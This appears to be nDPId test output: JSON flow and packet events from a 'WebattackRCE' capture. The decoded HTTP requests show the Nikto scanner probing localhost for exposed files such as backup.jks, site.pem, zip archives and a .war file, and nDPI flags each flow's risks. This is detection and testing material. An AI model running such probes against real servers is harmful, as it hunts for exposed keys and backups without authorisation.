+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":213,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277001,"flow_last_seen":1576420277001,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277001,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49970,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":213,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":213,"flow_packet_id":1,"flow_last_seen":1576420277001,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277001,"pkt":"AAAAAAAAAAAAAAAACABFAADAM9pAAEAGCFx\/AAABfwAAAcMyH5CilAu7EPfGmYAYAED+tAAAAQEICp1m\/DGdZvwxR0VUIC8xMjcwLnppcCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":213,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":213,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277001,"flow_last_seen":1576420277001,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277001,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49970,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":214,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277002,"flow_last_seen":1576420277002,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277002,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49972,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":214,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":214,"flow_packet_id":1,"flow_last_seen":1576420277002,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277002,"pkt":"AAAAAAAAAAAAAAAACABFAADAUGZAAEAG689\/AAABfwAAAcM0H5Crr2gHBF6lfIAYAED+tAAAAQEICp1m\/DKdZvwyR0VUIC8xMjcwLnppcCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":214,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":214,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277002,"flow_last_seen":1576420277002,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277002,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49972,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":215,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277004,"flow_last_seen":1576420277004,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277004,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49974,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":215,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":215,"flow_packet_id":1,"flow_last_seen":1576420277004,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277004,"pkt":"AAAAAAAAAAAAAAAACABFAADBfrVAAEAGvX9\/AAABfwAAAcM2H5AiEUbRArZM2IAYAED+tQAAAQEICp1m\/DSdZvw0R0VUIC8xMjcuMC5hbHogSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":215,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277004,"flow_last_seen":1576420277004,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277004,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49974,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":216,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277006,"flow_last_seen":1576420277006,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277006,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49976,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":216,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":216,"flow_packet_id":1,"flow_last_seen":1576420277006,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277006,"pkt":"AAAAAAAAAAAAAAAACABFAADBggJAAEAGujJ\/AAABfwAAAcM4H5AaCbpkhn3rTYAYAED+tQAAAQEICp1m\/DadZvw1R0VUIC8xMjcuMC5hbHogSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":216,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":216,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277006,"flow_last_seen":1576420277006,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277006,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49976,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":217,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277007,"flow_last_seen":1576420277007,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277007,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49978,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":217,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":217,"flow_packet_id":1,"flow_last_seen":1576420277007,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277007,"pkt":"AAAAAAAAAAAAAAAACABFAADC7TtAAEAGTvh\/AAABfwAAAcM6H5D6jdVeqyQPZoAYAED+tgAAAQEICp1m\/DedZvw3R0VUIC9iYWNrdXAuamtzIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":217,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277007,"flow_last_seen":1576420277007,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277007,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49978,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":218,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277010,"flow_last_seen":1576420277010,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277010,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49980,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":218,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":218,"flow_packet_id":1,"flow_last_seen":1576420277010,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277010,"pkt":"AAAAAAAAAAAAAAAACABFAADChG5AAEAGt8V\/AAABfwAAAcM8H5BcKrwJSZEDE4AYAED+tgAAAQEICp1m\/DqdZvw6R0VUIC9iYWNrdXAuamtzIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":218,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277010,"flow_last_seen":1576420277010,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277010,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49980,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":219,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277011,"flow_last_seen":1576420277011,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277011,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49982,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":219,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":219,"flow_packet_id":1,"flow_last_seen":1576420277011,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277011,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/sClAAEAGjA1\/AAABfwAAAcM+H5BuqIhDc4THFIAYAED+swAAAQEICp1m\/DudZvw7R0VUIC8xMjcuemlwIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":219,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277011,"flow_last_seen":1576420277011,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277011,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49982,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":220,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277013,"flow_last_seen":1576420277013,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277013,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49984,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":220,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":220,"flow_packet_id":1,"flow_last_seen":1576420277013,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277013,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/xzVAAEAGdQF\/AAABfwAAAcNAH5BZGv9XO\/ACDYAYAED+swAAAQEICp1m\/D2dZvw9R0VUIC8xMjcuemlwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":220,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277013,"flow_last_seen":1576420277013,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277013,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49984,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":221,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277014,"flow_last_seen":1576420277014,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49986,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":221,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":221,"flow_packet_id":1,"flow_last_seen":1576420277014,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277014,"pkt":"AAAAAAAAAAAAAAAACABFAADAIeRAAEAGGlJ\/AAABfwAAAcNCH5DPShmIhuR59oAYAED+tAAAAQEICp1m\/D6dZvw+R0VUIC9zaXRlLnBlbSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":221,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277014,"flow_last_seen":1576420277014,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49986,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":222,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277016,"flow_last_seen":1576420277016,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277016,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49988,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":222,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":222,"flow_packet_id":1,"flow_last_seen":1576420277016,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277016,"pkt":"AAAAAAAAAAAAAAAACABFAADA415AAEAGWNd\/AAABfwAAAcNEH5AFlNs7Kigy04AYAED+tAAAAQEICp1m\/ECdZvxAR0VUIC9zaXRlLnBlbSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":222,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277016,"flow_last_seen":1576420277016,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277016,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49988,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":223,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277017,"flow_last_seen":1576420277017,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277017,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49990,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":223,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":223,"flow_packet_id":1,"flow_last_seen":1576420277017,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277017,"pkt":"AAAAAAAAAAAAAAAACABFAADConZAAEAGmb1\/AAABfwAAAcNGH5DVgZoTcsiCOoAYAED+tgAAAQEICp1m\/EGdZvxBR0VUIC8xMjcwMDEud2FyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":223,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277017,"flow_last_seen":1576420277017,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277017,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49990,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 